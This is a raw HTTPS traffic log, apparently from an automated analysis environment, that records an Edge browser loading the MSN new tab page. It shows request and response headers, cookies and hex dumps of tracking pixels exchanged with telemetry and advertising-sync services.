                                                                                                                                                                  Set-Cookie: MUID=0136911D054E6BFC0E90846C04216AB7; domain=.msn.com; expires=Thu, 05-Feb-2026 06:54:32 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:31 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  14192.168.11.20597653.167.152.61443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:32 UTC920OUTGET /b?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:32 UTC961INHTTP/1.1 302 Found
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:32 GMT
                                                                                                                                                                  Location: /b2?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                  set-cookie: UID=15091701be8ac68bbcb80111736578472; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                  set-cookie: XID=15091701be8ac68bbcb80111736578472; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                  Via: 1.1 3ee33f3f5dc316a655c4e9a665ccee16.cloudfront.net (CloudFront)
                                                                                                                                                                  X-Amz-Cf-Pop: ORD51-P2
                                                                                                                                                                  X-Amz-Cf-Id: XeHYzK9R2jTtQdeEKEp8S3izy5YpbxcclCe39cAFRrz7tQ_KVk7QXg==


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  15192.168.11.206474013.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:32 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578471572&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 3841
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
                                                                                                                                                                  2025-01-11 06:54:32 UTC3841OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 33 31 2e 35 36 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-11T06:54:31.567Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"locale"
                                                                                                                                                                  2025-01-11 06:54:33 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=b8227a8623154231867fd24d82856ca9&HASH=b822&LV=202501&V=4&LU=1736578472730; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:32 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=003fb99de18c438f99e654d6348b5747; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:32 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1158
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:32 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  16192.168.11.2054685108.159.227.71443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:32 UTC968OUTGET /b2?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: UID=15091701be8ac68bbcb80111736578472
                                                                                                                                                                  2025-01-11 06:54:32 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:32 GMT
                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                  Via: 1.1 e006e171539cde52c00d735236295342.cloudfront.net (CloudFront)
                                                                                                                                                                  X-Amz-Cf-Pop: ORD56-P4
                                                                                                                                                                  X-Amz-Cf-Id: jPjgLF53OoZsf-X2wuqndL8i8cTct54ywO1fAjy3yyX8lDFk5YvE9w==


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  17192.168.11.205366523.33.85.243443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:32 UTC419OUTOPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                                                  Host: deff.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Origin: https://assets.msn.com
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.f4542117.1736578473.c603a39
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  18192.168.11.205804820.125.209.212443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC1238OUTGET /c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FE748FF748B4324A916C66DF435B563&MUID=0136911D054E6BFC0E90846C04216AB7 HTTP/1.1
                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; SM=T
                                                                                                                                                                  2025-01-11 06:54:33 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  ETag: "dda11c98eb61db1:0"
                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: MUID=0136911D054E6BFC0E90846C04216AB7; domain=.msn.com; expires=Thu, 05-Feb-2026 06:54:33 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                  Set-Cookie: SRM_M=0136911D054E6BFC0E90846C04216AB7; domain=c.msn.com; expires=Thu, 05-Feb-2026 06:54:33 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Sat, 18-Jan-2025 06:54:33 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Sat, 11-Jan-2025 07:04:33 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:32 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                  2025-01-11 06:54:33 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  19192.168.11.2053719151.101.1.44443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC655OUTGET /sg/msn/1/cm?taboola_hm=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: trc.taboola.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  P3P: policyref="http://trc.taboola.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  X-Fastly-to-NLB-rtt: 382
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                  X-SERVICE-VERSION: v1
                                                                                                                                                                  X-Served-By: cache-chi-kigq8000111-CHI
                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                  X-Timer: S1736578473.318868,VS0,VE2
                                                                                                                                                                  X-vcl-time-ms: 2
                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                  2025-01-11 06:54:33 UTC4INData Raw: 32 62 0d 0a
                                                                                                                                                                  Data Ascii: 2b
                                                                                                                                                                  2025-01-11 06:54:33 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 40 02 02 4c 01 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,@L;
                                                                                                                                                                  2025-01-11 06:54:33 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  20192.168.11.205485664.74.236.223443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC664OUTGET /uidmappixel?ext_uid=0136911D054E6BFC0E90846C04216AB7&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: sync.outbrain.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC375INHTTP/1.1 200 OK
                                                                                                                                                                  date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  content-length: 0
                                                                                                                                                                  x-traceid: 459b9415823f0aab61a02b46232e584c
                                                                                                                                                                  set-cookie: obuid=c2d90ce0-3ee7-459e-bd69-07e62925bb82; Max-Age=7776000; Expires=Fri, 11 Apr 2025 06:54:33 GMT; Path=/; Domain=.outbrain.com;SameSite=None;Secure
                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  21192.168.11.2050462204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC592OUTOPTIONS /auction HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: cache-control,content-type,x-ms-flightid,x-ms-numberline,x-msedge-clientid,x-msedge-market
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Headers: cache-control,content-type,x-ms-flightid,x-ms-numberline,x-msedge-clientid,x-msedge-market
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: CE4F322D97BD46549DBF49C3D1F1A622 Ref B: CHI30EDGE0122 Ref C: 2025-01-11T06:54:33Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  22192.168.11.206466413.107.42.14443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC653OUTGET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: px.ads.linkedin.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC754INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 95
                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                  Set-Cookie: bcookie="v=2&09c81158-a5b3-4336-8a63-7cc6eaa389ee"; domain=.linkedin.com; Path=/; Secure; Expires=Sun, 11-Jan-2026 06:54:33 GMT; SameSite=None
                                                                                                                                                                  Set-Cookie: lidc="b=OGST02:s=O:r=O:a=O:p=O:g=3440:u=1:x=1:i=1736578473:t=1736664873:v=2:sig=AQEX1C537yoWNs2__6_0AqD9YdPu1gnL"; Expires=Sun, 12 Jan 2025 06:54:33 GMT; domain=.linkedin.com; Path=/; SameSite=None; Secure
                                                                                                                                                                  LinkedIn-Action: 1
                                                                                                                                                                  X-Li-Fabric: prod-lor1
                                                                                                                                                                  X-Li-Pop: afd-prod-lor1-x
                                                                                                                                                                  X-Li-Proto: http/1.1
                                                                                                                                                                  X-LI-UUID: AAYraK8HnLv8qgCJp5q2Ng==
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 823E935FAF53428CBBC8BF2053190DDA Ref B: CHI30EDGE0421 Ref C: 2025-01-11T06:54:33Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:32 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:33 UTC95INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                  Data Ascii: PNGIHDR%VPLTEz=tRNS@fIDATc`!3IENDB`


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  23192.168.11.206413323.78.12.23443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC661OUTGET /cksync.php?type=nms&cs=3&ovsid=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: hbx.media.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                  Server: Apache
                                                                                                                                                                  Content-Length: 59
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Set-Cookie: visitor-id=3795800736047444000V10; Expires=Sun, 11 Jan 2026 06:54:33 GMT; domain=.media.net; Path=/; sameSite=none; secure=true
                                                                                                                                                                  Set-Cookie: data-nms=0136911D054E6BFC0E90846C04216AB7~~3;Expires=Sun, 11 Jan 2026 06:54:33 GMT;path=/;domain=.media.net; sameSite=none; secure=true
                                                                                                                                                                  p3p: CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA"
                                                                                                                                                                  P3P: CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA
                                                                                                                                                                  P3P: CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA
                                                                                                                                                                  Strict-Transport-Security: max-age=86400 ; includeSubDomains
                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                  x-mnet-hl2: E
                                                                                                                                                                  Expires: Sat, 11 Jan 2025 06:54:33 GMT
